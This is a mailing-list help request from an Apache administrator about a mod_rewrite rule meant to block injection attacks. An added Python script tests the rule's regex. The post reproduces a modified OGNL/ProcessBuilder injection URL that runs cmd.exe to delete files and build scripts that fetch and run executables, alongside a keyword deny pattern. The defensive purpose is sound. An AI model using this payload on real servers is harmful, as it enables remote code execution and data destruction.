httpd-users mailing list archives

From "Cabell, Jeff" <Jeff.Cab...@xerox.com>
Subject [users@httpd] RewriteCond help
Date Fri, 09 May 2014 17:06:38 GMT
We've noticed attempted injection attacks on one of our servers and even though the virus scanners
are halting the execution of the malicious code, there is still a level of penetration that
we are trying to stop.

Can anyone give me an idea why this URL is not triggering the RewriteRule below?

The intent is to redirect any URL containing references to cmd.exe, ftp.exe, any .bat file,
or anything with a SQL query embedded back to just pull up the site's homepage.

(Note: it is not the actual attack URL, but one that was modified to generate a harmless
file while still mimicking the attack method.)

https://[IP redacted]/appname/disabilityInfo.action?redirect:$%7b(new+java.lang.ProcessBuilder(new+java.lang.String%5b%5d%7b%27cmd.exe%27%2C%20%27%2Fd%20%2Fc%20md%20rewritetest%26cd%20rewritetest%26del%20*.*%20%2Ff%20%2Fs%20%2Fq%26echo%20bartsimpson.eat.my.shorts%20%3Ej%26echo%20homer%20%3E%3Ej%26echo%20mmmdoughnuts%20%3E%3Ej%26echo%20mget%20*.exe%20%3E%3Ej%26echo%20bye%20%3E%3Ej%26echo%20for%20%25%25i%20in%20(*.exe)%20do%20start%20%25%25i%20%3ED.bat%26echo%20for%20%25%25i%20in%20(*.exe)%20do%20%25%25i%20%3E%3ED.bat%26echo%20del%20%2Ff%20%2Fq%20%250%25%20%3E%3ED.bat%26D.bat%27%7D)).start()%7D


# The [NC] flag must stay on the same line as the RewriteCond; a line break before it is a syntax error.
RewriteCond %{QUERY_STRING} .*(java\.lang|FTP\.exe|cmd\.exe|\.bat|\.exe|insert|delete|set|declare|drop|update).* [NC]
# [F] answers 403 Forbidden and never performs the substitution, so no redirect to the homepage
# happens even when the condition matches; an actual redirect needs [R,L] instead of [F,L].
RewriteRule ^(.*)$ https://[IP redacted]/ [F,L]


Any help would be greatly appreciated.

Jeff Cabell
Applications Administrator
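The following is an added example, not code from the original message or from the httpd project. It reproduces the posted RewriteCond alternation in Python and applies it the way mod_rewrite applies a RewriteCond on %{QUERY_STRING}: to the raw, not percent-decoded query string, and case-insensitively because of [NC]. It shows that the pattern does match the opening of the posted query string (so if the rule is not firing, the regex itself is not the reason), that bare words such as set and update also match inside ordinary parameter names and values, and that a percent-encoded dot is only seen if the string is decoded before matching. All query strings other than the truncated one from the post are constructed for this example.

```python
"""Exercise the posted RewriteCond pattern the way mod_rewrite would.

Added example, not code from the original post. mod_rewrite matches
%{QUERY_STRING} raw (no percent-decoding) and, with [NC], case-insensitively;
both behaviours are reproduced here with Python's re module.
"""
import re
from urllib.parse import unquote

# Alternation exactly as it appears in the posted RewriteCond. The leading and
# trailing .* of the original are redundant for an unanchored search and are omitted.
PATTERN = r"(java\.lang|FTP\.exe|cmd\.exe|\.bat|\.exe|insert|delete|set|declare|drop|update)"
COND_RE = re.compile(PATTERN, re.IGNORECASE)  # [NC] -> case-insensitive

# Opening of the query string from the poster's modified sample URL (truncated
# here for readability; the full string matches on the same token).
POSTED_QUERY = (
    "redirect:$%7b(new+java.lang.ProcessBuilder(new+java.lang.String%5b%5d%7b"
    "%27cmd.exe%27%2C%20%27%2Fd%20%2Fc%20md%20rewritetest"
)

# Constructed query strings (not from the post) for comparison.
SAMPLES = {
    "posted sample URL (truncated)": POSTED_QUERY,
    "ordinary request": "id=42&lang=en",
    "benign parameter name containing 'set'": "page=1&dataset=q2",
    "benign free-text value": "q=last+update+2014",
    "percent-encoded dot": "file=report%2Eexe",
}


def matches_raw(query_string):
    """Apply the condition as mod_rewrite does: raw string, case-insensitive.
    Returns the token that matched, or None."""
    m = COND_RE.search(query_string)
    return m.group(1) if m else None


def matches_decoded(query_string):
    """Same pattern after percent-decoding, which the posted rule does not do."""
    m = COND_RE.search(unquote(query_string))
    return m.group(1) if m else None


def report(samples=SAMPLES):
    """Return {label: (raw_match, decoded_match)} for each sample."""
    return {label: (matches_raw(q), matches_decoded(q)) for label, q in samples.items()}


if __name__ == "__main__":
    for label, (raw, decoded) in report().items():
        print(f"{label:42} raw={raw!r:12} decoded={decoded!r}")
```

The two benign samples are the practical cost of this pattern: any query string containing dataset, offset, update and so on would be blocked along with the attack traffic, so word boundaries or more specific tokens are worth considering before such a rule goes on a production vhost. The last sample is why matching the raw query string alone is a weak filter: mod_rewrite hands the condition the string exactly as the client sent it, so the check should operate on the decoded form (or the application layer should validate the parameter itself).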
